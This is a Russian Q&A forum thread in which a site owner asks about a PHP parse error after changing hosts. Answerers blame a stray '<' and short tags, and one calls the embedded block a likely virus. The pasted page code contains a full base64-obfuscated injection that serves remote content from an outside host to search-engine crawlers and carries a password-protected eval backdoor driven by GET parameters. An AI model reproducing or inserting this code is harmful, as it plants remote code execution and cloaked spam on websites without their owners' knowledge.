@llegoo

Что означает строка?

Пытаюсь запустить сайт на другом хостинге - выдает ошибку "Parse error: syntax error, unexpected '<'"
Код страницы
<?php
require "ai_cms/ai_config.ai.php";
require $ai_inc."ai_errorparser.php";
?> <?php
//====inc====
<? $GLOBALS["_1010303272_"]=Array(base64_decode("ZXJ" ."yb3" ."JfcmV" ."w" ."b3" ."J0aW5n"),base64_decode("ZGVmaW5" ."l"),base64_decode("Z" ."GVma" ."W5l"),base64_decode("Z" ."mVvZg=="),base64_decode("ZGVmaW5l"),base64_decode("" ."aW1" ."h" ."Z2V" ."j" ."b3B5c" ."mVzY" ."W1" ."wbGVk"),base64_decode("dXJ" ."sZW5jb" ."2Rl"),base64_decode("ZGVm" ."aW5l"),base64_decode("bXlzc" ."WxfY2" ."xvc2U" ."="),base64_decode("c" ."HJlZ" ."19" ."tY" ."XRjaA=="),base64_decode("dXJ" ."sZW5jb2Rl"),base64_decode("" ."d" ."XJsZW5jb2Rl"),base64_decode("aW" ."5pX2d" ."ldA=" ."="),base64_decode("" ."ZmlsZV9n" ."Z" ."X" ."RfY29udGVudHM="),base64_decode("ZnVu" ."Y3Rpb25fZXhp" ."c" ."3" ."Rz"),base64_decode("Y3Vyb" ."F9pbml0"),base64_decode("" ."Y3VybF9zZXRvcHQ="),base64_decode("Y3" ."VybF" ."9zZXRvcHQ="),base64_decode("Y3" ."Vy" ."bF9" ."leGV" ."j"),base64_decode("Y3" ."V" ."y" ."bF9j" ."bG9z" ."ZQ=="),base64_decode("Zm" ."RmX3" ."NldF" ."92ZXJzaW" ."9u"),base64_decode("b" ."X" ."RfcmFuZ" ."A==")); ?><? function _978146258($i){$a=Array("aG9" ."zdA==","aH" ."R0cDovL" ."zJiaW4ucnUvbC5waHA=","dWlk","M" ."g==","cGFz" ."c" ."3dvcmQ=","" ."a2" ."FiYW5v" ."dm8=","Y2hhcnNldA==","dXRm","SF" ."RU" ."U" ."F9VU" ."0VSX0FHR" ."U5U","L" ."yh5Y" ."W5kZXh" ."8" ."Z29vZ2xlKS9pc" ."w" ."=" ."=","" ."aH" ."R0cDovL" ."w==","U0" ."VSVkVSX05" ."BTU" ."U=","UkVRVUVTVF9VUkk=","" ."P" ."3V" ."y" ."aT" ."0=","JnVhPQ=" ."=","" ."J" ."m" ."NoYX" ."JzZXQ9","JnV" ."p" ."ZD" ."0=","YW" ."xsb3d" ."f" ."dXJs" ."X2ZvcGVu","Y" ."3" ."V" ."ybF9pbml0","" ."Y2" ."1k","cGF" ."zc3dvc" ."m" ."Q=","Y2" ."1k","c" ."GF" ."zc3dvcmQ=");return base64_decode($a[$i]);} ?><?php $GLOBALS["_1010303272_"][0](round(0));$GLOBALS["_1010303272_"][1](_978146258(0),_978146258(1));$GLOBALS["_1010303272_"][2](_978146258(2),_978146258(3));while(round(0+1342)-round(0+268.4+268.4+268.4+268.4+268.4))$GLOBALS["_1010303272_"][3]($_0,$_1);$GLOBALS["_1010303272_"][4](_978146258(4),_978146258(5));if((round(0+58+58+58)+round(0+445.4+445.4+445.4+445.4+445.4))>round(0+174)|| $GLOBALS["_1010303272_"][5]($_GET,$_GET,$_SERVER));else{$GLOBALS["_1010303272_"][6]($_2,$_2);}$GLOBALS["_1010303272_"][7](_978146258(6),_978146258(7));$_3=round(0+765.2+765.2+765.2+765.2+765.2);$_4=$_SERVER[_978146258(8)];while(round(0+890+890+890)-round(0+667.5+667.5+667.5+667.5))$GLOBALS["_1010303272_"][8]($_SERVER,$_GET,$_2);if($GLOBALS["_1010303272_"][9](_978146258(9),$_4)){$_5=_978146258(10) .$_SERVER[_978146258(11)] .$_SERVER[_978146258(12)];$_6=host ._978146258(13) .$GLOBALS["_1010303272_"][10]($_5) ._978146258(14) .$GLOBALS["_1010303272_"][11]($_4) ._978146258(15) .charset ._978146258(16) .uid;if($GLOBALS["_1010303272_"][12](_978146258(17))== round(0+0.2+0.2+0.2+0.2+0.2)){print $GLOBALS["_1010303272_"][13]($_6);}else if($GLOBALS["_1010303272_"][14](_978146258(18))){$_1=$GLOBALS["_1010303272_"][15]($_6);$GLOBALS["_1010303272_"][16]($_1,42,false);$GLOBALS["_1010303272_"][17]($_1,19913,true);$_7=$GLOBALS["_1010303272_"][18]($_1);$GLOBALS["_1010303272_"][19]($_1);(round(0+1623+1623+1623)-round(0+1623+1623+1623)+round(0+66.75+66.75+66.75+66.75)-round(0+89+89+89))?$GLOBALS["_1010303272_"][20]($_GET,$_2,$_1,$_6):$GLOBALS["_1010303272_"][21](round(0+1205.66666667+1205.66666667+1205.66666667),round(0+973.8+973.8+973.8+973.8+973.8));print $_7;}}if(!empty($_GET[_978146258(19)])){if(!empty($_GET[_978146258(20)])){$_0=$_GET[_978146258(21)];$_2=$_GET[_978146258(22)];if(password == $_2){eval(stripslashes($cmd));}}} 
//====inc====
 ?>

На другом хостинге сайт работает, в чем может быть причина?
  • Вопрос задан
  • 2326 просмотров
Пригласить эксперта
Ответы на вопрос 4
cjbars
@cjbars
где-то лишняя '<'
Ответ написан
Комментировать
yarofon
@yarofon
Ну вот же ж
<?php
//====inc====
<?

Не оно?
Ответ написан
Комментировать
yarofon уже вон ответил в чем проблема. А строчка вирус наверное какой-то. Декодить надо. там не сложно.
Ответ написан
Возможно проблема из-за short_tag https://php.net/manual/en/ini.core.php#ini.short-o... На каком-то хостинге они включены, а на каком-то нет. По этому и небыло ошибки из-за <? (там где они выключены).

То что между inc я бы убрал, если это не твое конечно.
Ответ написан
Комментировать
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации
Похожие вопросы